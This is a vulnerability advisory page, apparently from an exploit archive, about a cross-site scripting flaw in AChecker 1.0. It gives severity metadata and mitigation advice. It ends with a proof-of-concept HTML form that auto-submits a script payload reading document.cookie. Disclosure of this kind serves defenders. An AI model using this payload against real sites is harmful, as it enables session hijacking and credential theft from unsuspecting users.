AChecker Cross-Site Scripting Vulnerability

vendor:

AChecker

by:

5.5

CVSS

MEDIUM

Cross-Site Scripting

CWE

Product Name: AChecker

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: a:achecker:achecker:1.0

Metasploit:

Other Scripts:

Platforms Tested:

AChecker Cross-Site Scripting Vulnerability

The AChecker application fails to properly sanitize user-supplied input, leading to a cross-site scripting vulnerability. An attacker can exploit this vulnerability to execute arbitrary script code in the browser of an unsuspecting user, potentially stealing authentication credentials and launching other attacks.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input sanitization and validation techniques. Additionally, web application firewalls can help detect and block malicious input.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/43240/info

AChecker is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

AChecker 1.0 is vulnerable; other versions may be affected. 

<form action="http://www.example.com/index.php" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="uri" value=&#039;http://1"><script>alert(document.cookie)</script>&#039; />
<input type="hidden" name="validate_uri" value="Check It" />
<input type="hidden" name="MAX_FILE_SIZE" value="52428800" />
<input type="hidden" name="uploadfile"; filename="" />
<input type="hidden" name="gid[]" value="8" />
</form>
<script>
document.main.submit();
</script>